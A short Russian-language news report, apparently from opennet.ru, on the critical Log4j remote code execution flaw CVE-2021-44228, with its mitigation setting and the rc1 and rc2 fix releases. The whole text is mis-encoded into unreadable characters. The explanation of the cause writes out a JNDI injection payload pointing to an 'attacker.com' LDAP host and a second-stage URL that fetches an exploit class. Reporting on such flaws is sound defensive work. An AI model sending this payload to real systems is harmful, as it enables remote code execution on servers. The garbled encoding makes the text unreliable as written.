ะ Apache Log4j, ะฟะพะฟัะปััะฝะพะผ ััะตะนะผะฒะพัะบะต ะดะปั ะพัะณะฐะฝะธะทะฐัะธะธ ะฒะตะดะตะฝะธั ะปะพะณะพะฒ ะฒ Java-ะฟัะธะปะพะถะตะฝะธัั , ะฒััะฒะปะตะฝะฐ ะบัะธัะธัะตัะบะฐั ััะทะฒะธะผะพััั, ะฟะพะทะฒะพะปัััะฐั ะฒัะฟะพะปะฝะธัั ะฟัะพะธะทะฒะพะปัะฝัะน ะบะพะด ะฟัะธ ะทะฐะฟะธัะธ ะฒ ะปะพะณ ัะฟะตัะธะฐะปัะฝะพ ะพัะพัะผะปะตะฝะฝะพะณะพ ะทะฝะฐัะตะฝะธั ะฒ ัะพัะผะฐัะต ยซ{jndi:URL}ยป. ะัะฐะบะฐ ะผะพะถะตั ะฑััั ะฟัะพะฒะตะดะตะฝะฐ ะฝะฐ Java-ะฟัะธะปะพะถะตะฝะธั, ะทะฐะฟะธััะฒะฐััะธะต ะฒ ะปะพะณ ะทะฝะฐัะตะฝะธั, ะฟะพะปััะตะฝะฝัะต ะธะท ะฒะฝะตัะฝะธั ะธััะพัะฝะธะบะพะฒ, ะฝะฐะฟัะธะผะตั, ะฟัะธ ะฒัะฒะพะดะต ะฟัะพะฑะปะตะผะฝัั ะทะฝะฐัะตะฝะธะน ะฒ ัะพะพะฑัะตะฝะธัั ะพะฑ ะพัะธะฑะบะฐั .
ะัะผะตัะฐะตััั, ััะพ ะฟัะพะฑะปะตะผะต ะฟะพะดะฒะตัะถะตะฝั ะฟะพััะธ ะฒัะต ะฟัะพะตะบัั, ะธัะฟะพะปัะทัััะธะต ัะฐะบะธะต ััะตะนะผะฒะพัะบะธ, ะบะฐะบ Apache Struts, Apache Solr, Apache Druid ะธะปะธ Apache Flink, ะฒะบะปััะฐั Steam, Apple iCloud, ะบะปะธะตะฝัั ะธ ัะตัะฒะตัั ะธะณัั Minecraft. ะะถะธะดะฐะตััั, ััะพ ััะฒะทะธะผะพััั ะผะพะถะตั ะฟัะธะฒะตััะธ ะบ ะฒะพะปะฝะต ะผะฐััะพะฒัั ะฐัะฐะบ ะฝะฐ ะบะพัะฟะพัะฐัะธะฒะฝัะต ะฟัะธะปะพะถะตะฝะธั, ะฟะพะฒัะพัะธะฒ ะธััะพัะธั ะบัะธัะธัะตัะบะธั ััะทะฒะธะผะพััะตะน ะฒะพ ััะตะนะผะฒะพัะบะต Apache Struts, ะบะพัะพััะน ะฟะพ ะฟัะธะฑะปะธะทะธัะตะปัะฝะพะน ะพัะตะฝะบะต ะฟัะธะผะตะฝัะตััั ะฒ web-ะฟัะธะปะพะถะตะฝะธัั 65% ะบะพะผะฟะฐะฝะธะน ะธะท ัะฟะธัะบะฐ Fortune 100. ะ ัะพะผ ัะธัะปะต ัะถะต ะทะฐัะธะบัะธัะพะฒะฐะฝั ะฟะพะฟััะบะธ ัะบะฐะฝะธัะพะฒะฐะฝะธั ัะตัะธ ะฝะฐ ะฟัะตะดะผะตั ััะทะฒะธะผัั ัะธััะตะผ.
ะัะพะฑะปะตะผะฐ ัััะณัะฑะปัะตััั ัะตะผ, ััะพ ัะถะต ะพะฟัะฑะปะธะบะพะฒะฐะฝ ัะฐะฑะพัะธะน ัะบัะฟะปะพะธั, ะฝะพ ะธัะฟัะฐะฒะปะตะฝะธั ะดะปั ััะฐะฑะธะปัะฝัั ะฒะตัะพะบ ะฝะฐ ะดะฐะฝะฝัะน ะผะพะผะตะฝั ะฝะต ัััะพะผะธัะพะฒะฐะฝั. ะกVE-ะธะดะตะฝัะธัะธะบะฐัะพั ะฟะพะบะฐ ะฝะต ะฟัะธัะฒะพะตะฝ. ะัะฟัะฐะฒะปะตะฝะธะต ะฒะบะปััะตะฝะพ ัะพะปัะบะพ ะฒ ัะตััะพะฒัั ะฒะตัะบั log4j-2.15.0-rc1. ะ ะบะฐัะตััะฒะต ะพะฑั ะพะดะฝะพะณะพ ะฟััะธ ะฑะปะพะบะธัะพะฒะฐะฝะธั ััะทะฒะธะผะพััะธ ัะตะบะพะผะตะฝะดัะตััั ะฒัััะฐะฒะธัั ะฟะฐัะฐะผะตัั log4j2.formatMsgNoLookups ะฒ ะทะฝะฐัะตะฝะธะต true.
ะัะพะฑะปะตะผะฐ ะฑัะปะฐ ะฒัะทะฒะฐะฝะฐ ัะตะผ, ััะพ log4j ะฟะพะดะดะตัะถะธะฒะฐะตั ะพะฑัะฐะฑะพัะบั ัะฟะตัะธะฐะปัะฝัั ะผะฐัะพะบ ยซ{}ยป ะฒ ะฒัะฒะพะดะธะผัั ะฒ ะปะพะณ ัััะพะบะฐั , ะฒ ะบะพัะพััั ะผะพะณะปะธ ะฒัะฟะพะปะฝััััั ะทะฐะฟัะพัั JNDI (Java Naming and Directory Interface). ะัะฐะบะฐ ัะฒะพะดะธััั ะบ ะฟะตัะตะดะฐัะต ัััะพะบะธ ั ะฟะพะดััะฐะฝะพะฒะบะพะน ยซ${jndi:ldap://attacker.com/a}ยป, ะฟัะธ ะพะฑัะฐะฑะพัะบะต ะบะพัะพัะพะน log4j ะพัะฟัะฐะฒะธั ะฝะฐ ัะตัะฒะตั attacker.com LDAP-ะทะฐะฟัะพั ะฟััะธ ะบ Java-ะบะปะฐััั. ะะพะทะฒัะฐััะฝะฝัะน ัะตัะฒะตัะพะผ ะฐัะฐะบัััะตะณะพ ะฟััั (ะฝะฐะฟัะธะผะตั, http://second-stage.attacker.com/Exploit.class) ะฑัะดะตั ะทะฐะณััะถะตะฝ ะธ ะฒัะฟะพะปะฝะตะฝ ะฒ ะบะพะฝัะตะบััะต ัะตะบััะตะณะพ ะฟัะพัะตััะฐ, ััะพ ะฟะพะทะฒะพะปัะตั ะฐัะฐะบัััะตะผั ะดะพะฑะธัััั ะฒัะฟะพะปะฝะตะฝะธั ะฟัะพะธะทะฒะพะปัะฝะพะณะพ ะบะพะดะฐ ะฒ ัะธััะตะผะต ั ะฟัะฐะฒะฐะผะธ ัะตะบััะตะณะพ ะฟัะธะปะพะถะตะฝะธั.
ะะพะฟะพะปะฝะตะฝะธะต 1: ะฃัะทะฒะธะผะพััะธ ะฟัะธัะฒะพะตะฝ ะธะดะตะฝัะธัะธะบะฐัะพั CVE-2021-44228.
ะะพะฟะพะปะฝะตะฝะธะต 2: ะััะฒะปะตะฝ ัะฟะพัะพะฑ ะพะฑั
ะพะดะฐ ะทะฐัะธัั, ะดะพะฑะฐะฒะปะตะฝะฝะพะน ะฒัะฟััะบ log4j-2.15.0-rc1. ะัะตะดะปะพะถะตะฝะพ ะฝะพะฒะพะต ะพะฑะฝะพะฒะปะตะฝะธะต log4j-2.15.0-rc2 ั ะฑะพะปะตะต ะฟะพะปะฝะพะน ะทะฐัะธัะพะน ะพั ััะทะฒะธะผะพััะธ. ะ ะบะพะดะต ะฒัะดะตะปัะตััั ะธะทะผะตะฝะตะฝะธะต, ัะฒัะทะฐะฝะฝะพะต ั ะพััััััะฒะธะตะผ ะฐะฒะฐัะธะนะฝะพะณะพ ะทะฐะฒะตััะตะฝะธั ะฒ ัะปััะฐะต ะธัะฟะพะปัะทะพะฒะฐะฝะธั ะฝะตะบะพััะตะบัะฝะพ ะพัะพัะผะปะตะฝะฝะพะณะพ JNDI URL.
เปเบซเบผเปเบเบเปเปเบกเบนเบ: opennet.ru